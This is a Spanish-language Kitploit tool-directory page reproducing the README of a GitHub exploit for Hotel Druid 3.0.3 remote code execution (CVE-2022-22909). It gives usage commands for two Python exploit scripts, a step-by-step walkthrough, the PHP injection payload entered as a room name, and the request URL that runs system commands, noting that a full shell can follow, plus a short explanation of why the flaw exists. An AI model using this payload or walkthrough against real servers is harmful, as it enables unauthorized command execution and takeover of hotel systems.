Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-22909 — Exploit basado en Python para Hotel Druid 3.0.3 Remote Code Execution (CVE-2022-22909). Inyecta payloads PHP a través de nombres de habitación para lograr ejecución de comandos y acceso a shell en objetivos vulnerables. | Kitploit
Herramientas/GitHubGitHub/kaal18/cve-2022-22909
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubkaal18/cve-2022-22909

CVE-2022-22909

Exploit basado en Python para Hotel Druid 3.0.3 Remote Code Execution (CVE-2022-22909). Inyecta payloads PHP a través de nombres de habitación para lograr ejecución de comandos y acceso a shell en objetivos vulnerables.

Ver Repositorio
242hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-22909 Hotel Druid 3.0.3 - Ejecución Remota de Código (RCE)

Exploit por kaal

Exploits

  1. HotelDruidExploit.py

Este exploit creará una nueva habitación con nuestro payload PHP como nombre de habitación.

Uso: $ ./HotelDruidExploit.py -h

image

$ ./HotelDruidExploit.py -u http://127.0.0.1/hoteldruid

image


  1. HotelDruidExploitRoom.py

Este exploit funcionará si ya conoces el nombre de la habitación.

Uso: $ ./HotelDruidExploitRoom.py -u "http://127.0.0.1/hoteldruid" -r "abc"

image


Recorrido del Exploit:

1). Navega a la página de Hotel Druid.

2). Haz clic en Mesas -> Habitaciones

image

3). En el campo Crear nueva habitación añade el siguiente código PHP y haz clic en Añadir.

{${system($_REQUEST[cmd])}}

image

4). Verás una nueva habitación con nuestro payload en el campo de nombre "Habitación".

image

5). Ve al enlace inferior y obtendrás ejecución de comandos. Luego puedes obtener un shell completo.

http://127.0.0.1/hoteldruid/dati/selectappartamenti.php?cmd=whoami

Nota: Cambia la IP por la IP objetivo de tu HotelDruid.

Descripción de la Vulnerabilidad:

Esta vulnerabilidad ocurre porque los nombres de las habitaciones se almacenan dentro de /var/www/html/hoteldruid/dati/selectappartamenti.php

image

Y selectappartamenti.php es un archivo PHP, por lo que cualquier código PHP dentro de ese archivo será ejecutado por el servidor.

Descargar herramienta